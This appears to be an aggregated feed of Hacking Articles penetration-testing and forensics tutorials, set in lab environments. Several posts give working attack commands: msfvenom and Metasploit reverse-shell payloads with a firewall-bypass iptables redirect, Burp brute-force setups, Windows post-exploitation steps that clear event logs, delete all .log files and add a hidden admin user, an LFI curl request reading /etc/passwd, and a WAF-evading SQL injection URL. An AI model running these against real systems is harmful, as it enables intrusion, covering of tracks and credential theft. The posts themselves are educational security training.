Now repeat the same methodology by changing the combination of flag to enumerate the state of any port.  For example we want to scan any port by sending combination of three flags [FIN, RST, and PSH] so let identify hex value for sum of three flags.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x0D 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP flags [FIN, RST and PSH] here we have used wireshark for network packet analysis and we found that it is showing TCP-packet of FIN, RST,PSH for hex value 0x0D coming from 192.168.1.104 on port 21 as shown in given below image. 

Manual Combination of Flags [FIN, SYN, RST, PSH]

Now repeat the same methodology by changing the combination of flag to enumerate the state of any port.  For example we want to scan any port by sending combination of four flags [FIN, SYN, RST, and PSH] so let identify hex value for sum of four flags.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x0F 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP flags [FIN,SYN, RST and PSH] here we have used wireshark for network packet analysis and we found that it is showing TCP-packet of FIN, SYN, RST,PSH for hex value 0x0F coming from 192.168.1.104 on port 21 as shown in given below image. 

AuthorRahul Virmani is a Certified Ethical Hacker and the researcher in the field of network Penetration Testing (CYBER SECURITY).    Contact Here

The post Nmap Scans using Hex Value of Flags appeared first on Hacking Articles.

Categories: Cyber India

Digital Forensics Investigation through OS Forensics (Part 2)

Tue, 30/Jan/2018 - 17:20

In Part 1 of this article we have covered Creating case, File Search and Indexing. This article will cover some more features/ functionalities of OSForensics.

For Part 1 if this article click here.

Recent Activity

Recent Activity feature allows an investigator to scan the evidence for recent activity, such as accessed websites, USB drives, wireless networks, recent downloads and many more.

To start with open OSForensics and select Recent Activity.

We have an option to capture the Recent Activities either through live acquisition of current machines or by scanning drives/evidences.

To capture the live acquisition of the current machine select the first option and click on scan. If we have opted to investigate the case of another machine at the time of creating the case (shown in part 1 of this article), we may get a warning message as shown below, Click on yes to continue.

But we will be acquiring our evidence (.E01 image file).

Scanning will start and may take some time for this operation to complete.

Once the scanning is complete we will get a popup with the summary of the scanned evidences.

Click on the OK button and on the recent activity window we can find all the recent activity details with the heading on the left pane and details of related files on the right.

Below is the list view of the files

We can also view the file details by clicking on File Details tab

To further analyse any file, simply right click on file for further file options.

 

Similarly we can investigate for the recent activity of any particular drive.

We can also change the configurations or apply/remove any filters as per the requirement but these changes are to be done before starting the scan.

To edit the configurations click on “Config” button located at the top right corner on recent activity window.

Check/Uncheck the options as required or if required change the date/date range for a particular time based activity and click OK.

For managing the filters click on the “Filters” button located below the “Config” button

We can add a filter as required by selecting a value from the dropdown or fill the details as required.

 In the below image we have applied a filter and set its parameters as per requirement.

Click on Add Filter button and then OK, the filter will get added.

This ends the Recent Activity feature.

Deleted File Search

Deleted files recovery is one of the prime requirements for digital forensics. OSF offers a very simple and efficient deleted file recovery/search.

To search the deleted files click on “Deleted files Search” and select the drive we want to search on from the dropdown. We can select the complete Physical drive/Hard Disk (PhysicalDrive0), Acquired Evidence or any Logical drive(C/D/E), for which we want to recover the data.

Click on the “Config” button and check/uncheck the options as required. Select the Quality from the drop down (Please note better the quality more time it will take to process), for better result check the file carving option. WE can also limit the file size we want to search for (this will omit the files that are not in the range to refine the search), Click Ok.

On preset drop-down select the file type we want to recover/search. Select all files if we need to have multiple file types as output.

Once all the settings are done, click on Search. Depending on the volume of data and configurations we opted for it may take some time for the process to complete.

We can also see the thumbnail view of the files for faster analysis.

To save /recover the file select the files we want to recover and right click for options and save the files.

This concludes the Deleted file search.

Mismatch File Search

This feature enables us to identify the files whose extensions doesn’t match their data. Through this we can capture some relevant evidences that could be in form of an image, document or pdf but pretending to be of some other extension. For example a word file can be mismatched with a jpeg file (such a data could is also called as “Dark Data”).

To start with click on Mismatch File Search, select the drive/directory along with the filter from dropdown or create a filter as required, if we are not sure about the filter settings, we can go with “All (Built In)” filter and click search.

This will show the result in file list. We can also see the thumbnail view of the files.

Memory Viewer

Memory Viewer feature shows active memory of the system on which OSF is working on. It cant be used to show the memory of acquired image or drive of another computer (we will illustrate this feature on our running machine and not on our evidence file). We can dump the live memory /RAM for further investigation.

To start with open OSF and click on Memory Viewer. We can see the list of all the processes currently running along with their Process ID (PID). Click on any process and we can see its details under process Info. Click on refresh to refresh the process list.

Click on select window the cursor icon will change from pointer to a circle, click anywhere on screen or on any other running application and we can see the process details of the process we have clicked on. For instance in the below image we have clicked on an open word file and the process corresponding to that word file will get displayed.

Click on dump Physical Memory, this will dump the physical memory/ RAM in a .bin file and can save it anywhere. In below image we are saving the file with name Memory Dump.bin in a folder named Physical Memory Dump on Desktop

As we click on save a popup will appear till the Memory is being dumped.

Once completed, we will get a success Message.

We can also save a crash dump, just browse to a directory and save the file. The extension of the crash dump file is .dmp. In below image we are saving a crash dump file with a name CrashDump.dmp. We will get the following message when the dump is in progress

Once the dump is completed we will get a success message.

This concludes the Memory Viewer

Prefetch Viewer

The prefetch viewer displays the .exe files that we have last executed on the system. To start with open OS Forensic and click on prefetch viewer.

WE can browse the drive from the dropdown to check the .exe file that have executed on a particular drive. We can click on any particular drive and can see the details of the exe along with mapped files under mapped file tab.

Also we can view the directories, mapped with the .exe file under Mapped Directory Tab.

This concludes Prefetch Viewer.

For more on OSForensics wait for the next article.

Author: Ankit Gupta, the author and co-founder of this website, an ethical hacker, forensics investigator , penetration testing researcher and telecom expert. He has found his deepest passion to be around the world of telecom, cyber security and digital forensics. Contact Here

The post Digital Forensics Investigation through OS Forensics (Part 2) appeared first on Hacking Articles.

Categories: Cyber India

WordPress Exploitation using Burpsuite (Burp_wp Plugin)

Tue, 30/Jan/2018 - 15:18

Burp_wp is an extension of burpsuite used to scan and find vulnerabilities in wordpress plugins and themes using burpsuite proxy. It was created by Kacper Szurek and can be downloaded from here.

Let’s begin

To run this extension we first need to install jython. Jython is an implementation of python programming that can run on java platform. You can download jython from here.

Now we download jython to burpsuite. We go to the python Environment and locate the jar file.

Now we go to extender, and select extensions tab to add the burp_wp extension.

We click on Add, a pop up will come. We select python as extension type and give the location at which the burp_wp file is located. We select “show in UI” for standard output and error to get any error if any occur.

As soon as the extension get installed we get the message in the image below that shows it was installed successfully.

Now we get a new “Burp WP” tab. Burp_WP automatically updates the first time it gets installed. It downloads the list of vulnerable plugins and theme from the database of WPscan.

Now we intercept the request of the website we want to scan for vulnerabilities.

As soon as we forward the request we go to Burp WP tab and we can find all the vulnerable plugins and themes on the website. We will get all vulnerable plugins and themes as we go through the site.

Now we use metasploit to exploit this vulnerability.

msf > use exploit/unix/webapp/wp_nmediawebsite_file_upload

msf exploit(unix/webapp/wp_nmediawebsite_file_upload) > set rhost 192.168.1.143

msf exploit(unix/webapp/wp_nmediawebsite_file_upload) > run

As soon as we run this exploit we get the reverse shell.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post WordPress Exploitation using Burpsuite (Burp_wp Plugin) appeared first on Hacking Articles.

Categories: Cyber India

Beginners Guide to Burpsuite Payloads (Part 2)

Mon, 29/Jan/2018 - 21:27

Hello Friends!!  In our previous article part1 we had discussed how to perform brute force attack on any web application server for making unauthorized login into it using some Payload of Burpsuite. In part 2 articles you will learn more about brute force attack with help of remaining BurpSuite payloads that might be helpful in other situation.

Let’s Start!!

Character Substitution

This type of payload allows to configure a list of strings and apply various character substitutions to each item. This type of payload is useful in password guessing attacks and generating common variations on dictionary words.

The UI of this payload allows you to configure a number of character substitutions. For each item, it will generate a number of payloads, which include all permutations of substituted characters according to the defined substitutions.

 For example, the default substitution rules states (which include e > 4 and r > 5), the item “Raj Chandel” will generate the following payloads:

raj chandel

5aj chandel

raj chand4l

5aj chand4l

First, we have intercepted the request of the login page in the DVWA LAB, where we have given a default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as
  • In the given below image we have selected password that means we will need one dictionary files for password.

 Now click on payloads option after selecting payload position. Here we can add a dictionary by clicking on Load option or we can manually add Strings by clicking on the Add option.

Now we have substituted 4>a , 5>s , 9>o as per our requirements to match the password and we have added the input as p445w9rd using the Add option which will substitute the character’s according to the Defined substitution as shown in the image.

Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

 And to confirm the password matched, we will give the matched password in the DVWA LAB login page. We will see a message “Welcome to the password protected area admin” which shows are success in the character substitution payload attack.

Copy Other Payload

This is a type of payload which can copy the value of the current payload to another payload position. It is very useful for attack types that have multiple payload sets such as cluster bomb, pitch fork and battering ram. This payload type can be useful in various situations, for example:

  • Suppose we are using two different parameters and we want to attack at two different fields, therefore we can set different “payload types” at multiple “payload sets” inside burpsuite payload configuration as per our attack type as it allows us to simply use the same dictionary for both payload that we have set at particular position by giving the position of the payload we want to copy. It will execute the complete payload which is set at a specific position.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given wrong username and password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted username and password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack which is the username and password and click on Add button.
  • Choose the Attack type as Cluster Bomb.
  • In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Now click on payloads option after selecting payload position, here we need to add a dictionary which will use for both payload set. Then select the Payload type as Simple list for Payload Set ‘1’ which will attack at the username field.

Now  to attack at the password field we will select Payload type as Copy other payload for Payload Set ‘2’ because we want to attack the same payload type at payload set 2 which will copy the dictionary given for payload set 1 to attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the username and password which will give you the correct username and password. The moment it will find the correct value, it will change the value of length as shown in the image.

And to confirm the password matched, you can give the matched password in the BWAPP LAB login page.

Username Generator

This type of payload allows you to set up a list of names or email addresses, and can produce usernames from given specific schemes.

For example, Let’s take a username “raj chandel” which can give results in up to 115 possible usernames, some combination are as follows :

rajchandel

raj.chandel

chandelraj

chandel.raj

chandel

raj

rajc

etc…

This type of payload is useful to target at a specific user, where you do not know the username or email address scheme of the user which is being used in a specific application.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given wrong username and password. Then click on login , the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted username and password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack which is the username and password and click on Add button.
  • Choose the Attack type as Cluster Bomb.
  • In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the Payload type as “Username Generator” for Payload Set ‘1’ which will attack at the username field, we have a given input string “raj chandel” by using the Add option as shown in the image, which will use different permutations on that input string given to match the correct username.

Now to attack at the password field we will select Payload type as Simple list for Payload Set ‘2’ for which we have added a dictionary manually created by us by using the Load option.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the username and password which will give you the correct username and password. The moment it will find the correct value, it will change the value of length as shown in the image.

Dates

This type of payload generates date payloads within a given range and in a specified format. This type of payload is can be used in data mining or brute forcing.

For example it can be used to guess a user’s birth date, wedding date, anniversary date etc which can be used to brute force the security questions for an application or web applications, or it can used to brute force the password of user’s, where user’s uses dates as their password.

The following options are available in this type of payload:

  • From – This is said as the first date which will be generated.
  • To – This is said as the last date which will be generated.
  • Step – This is said as an increase between sequential dates, days, weeks, months or years. It should be a positive value.
  • Format – This is said as the format in which dates can be represented. we can select from different predefined date formats, or we can make our own custom date format as per our requirement. Some example of the date format are given below:
E Mon EEEE   Monday D 2 dd 02 M 9 MM 09

Repeat the same to intercept the request of the login page in the Bwapp LAB, where we have given wrong username and password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted username and password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack which is the username and password and click on Add button.
  • Choose the Attack type as Cluster Bomb.
  • In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the Payload type as Simple list for Payload Set ‘1’ which will attack at the username field where we have given a dictionary as an input string as shown in given below image.

Now to attack at the password field we will select Payload type as Dates for Payload Set ‘2’ because we are guessing the user might have its birth date or any other date as a password.

After this we have set the inputs for Payload set ‘2’ in the fields given in the payload options such as FROM, TO, STEP and FORMAT as shown in the image.

Now Select Start Attack in the Intruder menu for brute force attack.

Sit back and relax because now the burp suite will do its work, match the username and password which will give you the correct username and password. The moment it will find the correct value, it will change the value of length as shown in the image.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking ArticlesHe is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Beginners Guide to Burpsuite Payloads (Part 2) appeared first on Hacking Articles.

Categories: Cyber India

Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports)

Mon, 29/Jan/2018 - 15:06
Introduction

Network Address Translation generally involves “re-writing the source and/or destination addresses of IP packets as they pass through a router or firewall” (from http://en.wikipedia.org/wiki/Network_Address_Translation)

The Linux kernel usually possesses a packet filter framework called netfilter (Project home: netfilter.org). This framework enables a Linux machine with an appropriate number of network cards (interfaces) to become a router capable of NAT. We will use the command utility ‘iptables’ to create complex rules for modification and filtering of packets. The important rules regarding NAT are – not very surprising – found in the ‘nat’-table. This table has three predefined chains: PREROUTINGOUTPUT und POSTROUTING.

ALL-PORTS payload:-

‘reverse_tcp’ only allows connection to one port, but if the victim has blocked outgoing connections except a few ports. Then it makes it difficult for the attacker to set a port for listening. ‘reverse_tcp _allports’ is used to to brute-force all the ports from {1-65535}.

We use iptables to reroute any incoming connection to the listening port.

Let’s begin

We use metasploit to create a meterpreter reverse shell.

msfvenom -p windows/meterpreter/reverse_tcp_allports lhost=192.168.1.139 lport=4444 -f exe > reverse_shell.exe

We now setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp_allports

msf exploit(multi/handler) > set lhost 192.168.1.139

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > run

Now we setup the firewall on our windows machine. We open firewall and select outbound connections.

We select ports to define the ports we need to block.

We select tcp to block tcp packets, and select port from 4444-5555.

Now we select ‘Block the connection’ to block all the outgoing traffic packets from these ports.

Now we select the types of connection the firewall applies to.

We now name the firewall rule as “REVERSE_SHELL” and click finish to apply the rule.

Now we define iptables to reroute all traffic coming to port 4444-5556 to port 4444. So that when the reverse shell tries to connect to our system on port 5556 it will be rerouted to port 4444.

iptables -A PREROUTING -t nat -p tcp –dport  4444:5556 -j REDIRECT –to-port 4444

As soon as the victim runs the file we get our reverse shell.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports) appeared first on Hacking Articles.

Categories: Cyber India

Digital Forensics Investigation using OS Forensics (Part1)

Mon, 29/Jan/2018 - 12:45

About OSForensics

OSForensics from PassMark Software is a digital computer forensic application which lets you extract and analyse digital data evidence efficiently and with ease. It discovers, identifies and manages ie uncovers everything hidden inside your computer systems and digital storage devices.

OSForensics ia a self capable and standalone toolkit which has almost all the digital forensics capabilities including Data acquisition , extraction, analysis, email analysis, data imaging, image restoration and much more.

In this article we will cover all the major capabilities of OSForensics for digital forensics investigations.

Undiscovering OSForensics

To start with open OSForensics, we can see the OSForensics window open .

On the left hand side are the main options/ capabilities of OSforensic we will be talking about in details.

Please note that the start option highlights the main tools. Features of OFS which are widely used the same options can also be accessed through the tabs on the left pane.

The first option is Manage Case:

Whatever task/operation we want to perform in OSF, it is always advisable to create a case for that. Creating a case is also helpful to distinguish multiple processes / operations from one another and also act as a container of the work done which is also helpful in future reference.

To create a new case click on Create Case icon in start option or new case button in Manage case option and provide all the relevant details related to the case. Also note the location where we want to save the case.

Enter all the details and click on OK, we can see the case getting listed. If are working on more than one case at a time or we have multiple cases listed on OSF we need to select which case we need to work on. To do this select the case and click on load case, we will see a green check mark against the case which is presently loaded.

We can delete any case or import a case from already created case.

For this article we will be working on NPFJeane case, it is a demo case (E01) of which we will be doing forensics investigation. (This will be our evidence, we can do the same with any other data or computer disk).To add the evidence to our case click on add device.

Select the image file and browse for the Evidence file and click open.

All the partitions in the acquired image will get listed. Select the partition and click OK.

The evidence will get added and evidence name will get displayed. If required we can change the display name.

Once successfully added the evidence will get listed as shown below.

File Search

This option is used to search any particular file name, to search any particular file we can simply give the file name and browse for the drive, directory or any other location we need to search.

There is a preset option we can use this to select any particular file category

Also we can filter/refine the file search by changing the configuration settings, to do so click on the config button and change the settings as required.

Click on OK and in file search window enter the filename and click on search, Depending on the data volume The search will take a little time and will display the results . In our search we have searched the term “Sale” and this will show all the files who have the term “resume” in their name.

WE can also view the searched files in thumbnails

And timeline view. Timeline view will show a bar graph representation of that keyword on the basis of time and keyword count.

This ends the file search.

Create Index / Indexing

Index search is a more deep and refined search and also very vital for forensic investigations.

The most intuitive method for keyword searching is to provide a single keyword, and search for occurrence of that keyword within our data/evidence. To achieve this objective the best way is to create an index of the drive/directory within which we need to perform a search. An index is simply a list of offsets for occurrences of required keywords. Indexing allows to search within the contents of many files /drive/directory /image file at once.

In OSF we can either indexed on the predefined files types

Or can create a customised template

We can select the extensions we need to search on, skip any file or folder by specifying its name or by limiting the file size. Customise the template and click OK

Customise the template and click OK. Click on next and proceed to Step 2. Here we need to select the drive or directory we want to index and select the indexing option from the drop down as shown below and click on OK.

The image, drive or folder selected will get listed, (we can add multiple drives/directories) for indexing.

Click on next and proceed to step 3

Now we will get a view of the drives we are indexing along with the extensions that will be indexed. If everything is as per requirement click “Start Indexing” else click the “Back” button to make any changes.

Indexing will start and depending on the data it will take some time for the indexing to complete.

Initially Pre scan is performed and immediately after Pre-Scan indexing will start automatically

Once indexing is complete, we will get a popup with indexing finished message.

WE can also check index log to check the status /result of indexing and any error that the system may have occur during indexing.

Search Index

Above we have indexed the drive for keyword searching, now we will actually search for the keywords in the indexed drive/directory.

To start with click on search index.

We can see all the drive we have indexed in a drop down

We can either enter the keywords we want to search one by one in “Enter Search Word” tab click on search and will get the result on the screen.  WE have searched for the keyword “Sales”, inside our evidence and can see all the files containing the word Ethical.

Also we can upload the keywords we want to search in a text file and upload it, this option is suitable if we want to search multiple keywords at same time.

We have created a text file named key.txt with three keywords and saved it on desktop.

To upload this file click on “Use Word List File” and upload the above referred file

We can see the result of the keywords in the screen along with the total number of hits of each keyword in the indexed directory, under history Tab.

Double click on the keyword in the list and all the files containing that particular keyword will get listed under file tab.

This ends the Indexing and search under indexing.

For more on OSForensics wait for the next article.

Author: Ankit Gupta, the author and co-founder of this website, an ethical hacker, forensics investigator , penetration testing researcher and telecom expert. He has found his deepest passion to be around the world of telecom, cyber security and digital forensics. Contact Here

The post Digital Forensics Investigation using OS Forensics (Part1) appeared first on Hacking Articles.

Categories: Cyber India

Manual Post Exploitation on Windows PC (System Command)

Sun, 28/Jan/2018 - 22:57

This article is about Post Exploitation on the Victim’s System using the Windows Command Line. When an Attacker gains a meterpreter session on a Remote PC, then he/she can enumerate a huge amount of information and make effective changes using the knowledge of the Windows Command Line.

Requirement

Attacker: Kali Linux

TarObtain: Window PC

To execute this, we will first Obtain the meterpreter session of the Remote PC which you can learn from here. After gaining the session, escalate its privileged to Administrator which you can learn from here.

Now to access windows command line, type ‘shell’ in the meterpreter shell.

Let’s Start!!

Obtain User Details and its Privileges

After gaining the meterpreter shell or windows command line, before doing any work. It is important to know the current user. This command is usually used to verify that the account that we were trying to access is the one we got. This can be simply done using the command whoami.

To increase our reach, we will an option in “whoami” command:

[/all]: To show all the details about the user.

Example: whoami /all

As seen below we have username, SID and local group details

We also Obtain details about the privileges that are enabled or disabled to the user we are currently logged on.

Obtain the System Info

This command helps us enumerate lots of information regarding the system like hostname, domain, time zone and much more.

Example: systeminfo

We can sort the basic system details such as (Manufacturer, Build, and Model) of the victim’s System using findstr.

Example: systeminfo | findstr System

As shown in the below screenshot we have the Boot Time, Manufacturer, Model, Type, Directory and Language of the Victim’s System.

We can obtain the location (as close as the country) of victim’s System using systeminfo.

Here we are using findstr with systeminfo to filter the systeminfo results.

Example: systeminfo | findstr Time

As shown in the below screenshot we have the Time Zone (UTC+05:30), so we can say that the victim’s System is in “INDIA”.

Obtain Memory Details (Physical, Virtual, In Use, Free)

We can Obtain the basic memory details of the victim’s System using systeminfo.

Here we are using findstr with systeminfo to filter the systeminfo results.

Example: systeminfo | findstr Memory

As shown in the below screenshot we have the Total Physical Memory 3.5 GB out of which 1.6 GB is available, we are also Obtainting Virtual Memory Details.

Obtain the List System Drivers

We can display a list of all installed device drivers on the victim’s system and their properties through the command called driverquery.

Example: driverquery

 

Obtain the List of Kernel Drivers

We can the list of Kernel Drivers on the victim’s System using driverquery.

Here we are using findstr with driverquery to filter the driverquery results.

Example: driverquery | findstr Kernel

As seen below we have obtained a list of kernel drivers which can be used to get the direct exploits to the Victim’s System.

Obtain the List of File System Drivers

We can the list of File System Drivers on the victim’s System using driverquery.

Here we are using findstr with driverquery to filter the driverquery results.

Example: driverquery | findstr “File System”

Display Info about a Particular Service

We can obtain information about a particular service using sc command. Here we are using following options with sc command:

[query] to Obtain the names of a service.

Syntax: sc query [service name]

Example: sc query wuauserv

Obtain the list of Active Tasks

We can obtain information about running tasks using tasklist command.

This command shows the name of the task running along with the Process ID (PID), Session Name, Session Number and Memory Usage.

Syntax: tasklist

We can sort the output of tasklist according to the modules using the following options of tasklist command:

[/m]: To specify the Modules in Tasklist

But we will have to mention the module which is to be used to sort the Tasklist.

Syntax: tasklist /m [Module Name]

Example:  tasklist /m ntdll.dll

Here we can see all the tasks linked with ntdll.dll module.

Killing Tasks

We can kill tasks on the Victim’s System using a command called taskkill.

Taskkill requires either one of two things:

  1. Process Id
  2. Task Name

Here we are going to use [/f] option in taskkill, it enables the Taskkill to forcefully kill the tasks.

Killing the Tasks using the Process ID

Syntax: taskkill /f /pid [Process id of Task]

Example: taskkill f /pid 7236

Killing the Tasks using the Task Name

Syntax: taskkill /f /im “[Task Name]”

Example: taskkill /f /im “Taskmgr.exe”

Start or Stopping Services

We can start a service or some backdoor without the knowledge of the Victim using sc command.

Here we are using following options with sc command:

[start] to start a service.

Syntax:sc start [Service Name]

Example: sc start TeamViewer

As you can see in the below image the service has started.

We can also stop a service using sc command.Here we are using following options with sc command:

[stop] to start a service.

Syntax:sc stop [Service Name]

Example: sc stop TeamViewer

As you can see in the below image the process Stopped

List all the logs on the System

We can obtain a list of all the logs on a system using wevtutil command. Here we are using following options with wevtutil command:

[el] to List log names.

Example: wevtutil el

Clear a specific logon the System

We can clear a specific log on a system using wevtutil command. Here we are using following options with wevtutil command:

[cl] to List log names.

Syntax: wevtutil cl [log name]

Example: wevtutil cl System

Find all the Hard Disk/Storage Partitions on a System

While penetration testing a Remote PC, knowledge of all the Hard Disk or Storage Devices and Partitions is essential so that we can sweep all the partitions and Storage Devices in hope to find data of any particular importance.

This can be done using fsutil command. Here we are using following options with fsutil command:

[fsinfo] to view file system info.

[drives] to list all drives.

Example: fsutil fsinfo drives

As you can see below that the Victim System has 4 Hard Disk Partitions C, D, E and F

Delete all logs on a System

While penetration testing a remote pc, it is essential to remove the trace of youractivities, so we need to remove the evidence of our presence which can be found in log files.

The entire Log file has a .log extension so we are going to sweep the System Directory for files with extension .log and delete them with del command.

Note: Use this command with the path set to System Directory (In my case it is C:\)

Here we are using following options with del command:

[/a] to select files based on attributes.

[/s] to select System Files (/s is an attribute so it is to be used after /a)

[/q] to use Quiet Mode (It doesn’t ask if Ok to delete on global wildcards)

[/f] to force delete the read only files

Syntax:del [Directory]\*.log /a /s /q /f

Example: del \*.log /a /s /q /f

As you can see in the below screenshot the process of detecting and deleting the files with .log extension has started.

Manage Local Users

While penetration testing a remote PC, it is important to obtain the list of Local Users so that attacker can gain infomation about the various users assigned to that particular system.

This can be done using net command. Here we are using following options to be used with net command:

[-user] to display the list of local users

Example: net user

It is always advantageous to add a user in the Local Groups so that attacker can perform certain tasks on that system.

This can be done using net command. Here we are using following options with net command:

Syntax:net user [logon_name] [password] /add

Example: net user hacker pass123 /add

Many times, we come across a situation where we will have to perform certain administrative tasks, so we will add the user we created to the Administrative local group

Here we are using following options to be used with net command:

[-localgroup] to select the list of local groups

Syntax: net localgroup administrators [logon_name] /add

Example: net localgroup administrators hacker/add

In the above example, I have added a user in the local administrators group named as hacker. We can verify using the “net user” command

Now, during the clean-up process it is important to delete the local user created.

This can be done using net commandHere we are using following options with net command:

Syntax: net user [logon_name] /del

Example: net user hacker /del

Here you can see that I have used net command to add a user, making it a member of administrator local group and then deleting that user.

Display the List of all Scheduled Tasks

While penetration testing a remote PC, it is necessary to know the scheduled tasks to plan the attacks accordingly to further penetrate the Victim’s System. This can be done using schtasks.

We can sort schtasks so as to obtain a better readable format i.e. in a List Format.

Here we are using following options with schtasks command:

[/query]to display all scheduled tasks

[/fo] to specify the format of the Output (In this case we use List)

[/v] to use verbose mode

Example: schtasks /query /fo LIST /v

Author: Pavandeep Singh is an Ethical Hacker, Web Penetration Tester, Windows Command Line Expert and Researcher at hackingarticles.in. Contact here

The post Manual Post Exploitation on Windows PC (System Command) appeared first on Hacking Articles.

Categories: Cyber India

Hack the USV: 2017 (CTF Challenge)

Fri, 26/Jan/2018 - 11:05

Hello friends! Today we are going to take another CTF challenge known as USV: 2017. The credit for making this vm machine goes to “Suceava University” and it is another capture the flag challenge in which our goal is to find 5 flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.18 but you will have to find your own)

Let’s do an nmap scan for port enumeration.

nmap -A -p- 192.168.0.18

We find port 21,22,80,4369,5222,5269,5280,15020,33939 to be open. Port 80 is running http and port 15020 is running https.

So we first open 192.168.0.18 in our browser.

We don’t find anything on this page so we enumerate the directories for further information.

dirb http://192.168.0.18

During our directory enumeration we find a page called admin2, we open it in our browser and find it to be login page.

We take a look at the source code and find that the password is hidden itself in the page. The page uses javascript to verify the password. The javascript is in hex encode

We first decrypt the hex encode and find that if the value is 1079950212331060 it will let you enter or it will show wrong password. Now the final value is calculated using a formula:

(stringconcat(password+4469)-234562221224)*1988=1079950212331060

Now when we calculate the value of the password we find it to be 77779673. When we enter it we get the 1st flag.

Now we open the ip 192.168.0.18 at port 15020 as it is running another apache service. When we open the ip on our browser we find that we need to install ssl certificate. We take a look at the details of the certificate for information; at the issuer section we find our 2nd flag.

We accept the certificate and open the web page.

We don’t find anything on the webpage. So we enumerate the directories on this page.

dirb http://192.168.0.18:15020

Here we find two interesting directories blog/ and vault/. The vault/ directory contain an enormous amount of directories so we leave it for now.

We open blog/ directory and find a few blogs with few comments.

 

Now going through the blogs we find kevin’s blog with 1 comment that hints it has a flag inside his home directory.

We take a look inside source code and hint to open a php file called download.php.

When we open it we find to use image parameter to open file, this page maybe vulnerable to LFI.

We cannot exploit LFI vulnerability using the browser, we use post data using curl to exploit the LFI vulnerability.

curl -d “image=/etc/passwd” https://192.168.0.18:15020/blog/download.php -k

Now as it was wriiten in the comment of kevin’s blog we check for the flag in /home/kevin/ directory and find the 3rd flag.

curl -d “image=/home/kevin/flag.txt” https://192.168.0.18:15020/blog/download.php -k

Now we go to the other vault/ directory, it contains a lot of directories so we download it on our system to make it easier for us to look through the directories. We download the entire site using recursive download utility of wget.

wget  -r –no-check-certificate “http://192.168.0.18:15020/vault

Now we use find command to look for files and we use grep to rule out .html files. We found two files rockyou.zip and and a cap file.

find ./ -type f | grep -v .html

We open the cap file using wireshark going through the packets we found it to be a wifi handshake file.

We use this site here to convert the cap file to hccapx, to make it compatible for hashcat.

Now we use hashcat to decrypt the the handshake. We use the wordlist provided by the server just in case it had some extra keywords.

hashcat -m 2500 -a 0 ctf.hccapx 192.168.0.18:15020/rockyou.txt

We use username admin and the password we find from hashcat that is “minion.666” to login through the admin page.

As soon as we login this page, we find that this page maybe vulnerable to sql injection.

Now we use burpsuite to capture the request and use CO2 extension of burpsuite to exploit the sql injection but first we take a look at the source code.

When we look at the source code we find our 4th flag.

Now we use CO2 for SQL injection. We select database, tables, columns and dump to grab all the name of databases,tables and columns. 

It gave us the name of the database, tables and columns. Unfortunately it couldn’t dump the database for some reason. So we manually exploit the sql injection through the browser.

We find that the server uses a firewall that blocks any sql query. We use normalization method to bypass this firewall. With name of the columns and table we were able to execute our SQL injection.

https://192.168.0.18:15020/blog/admin/edit.php?id=7 /*union*/union/*all*/all/*select*/select%20,1,login,password,4%20from%20users%20order%20by%201%20limit%201,1

When we change the parameter of the id the output also changes, after going through different parameters we find that parameter 7 gave us our 5th and final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the USV: 2017 (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

Forensic Imaging through Encase Imager

Thu, 25/Jan/2018 - 22:14

Scenerio: Mr X is suspected to be involved in selling his company’s confidential data to the competitors, but without any evidence no action could be taken against him. To get into reality and proof Mr X guilty, company has requested the forensic services and have come to know all the relevant data is present inside the desktop provided to him.

This article is about getting the forensic image of the digital evidence and restoring it to any other drive.

Since it is never advised to work with the original evidence because we may lose some relevant data accidentaly, so we will create image of the original evidence and work on it further. This way the original evidence is safe and the integrity and authenticity of the evidence could be proved through hash values.

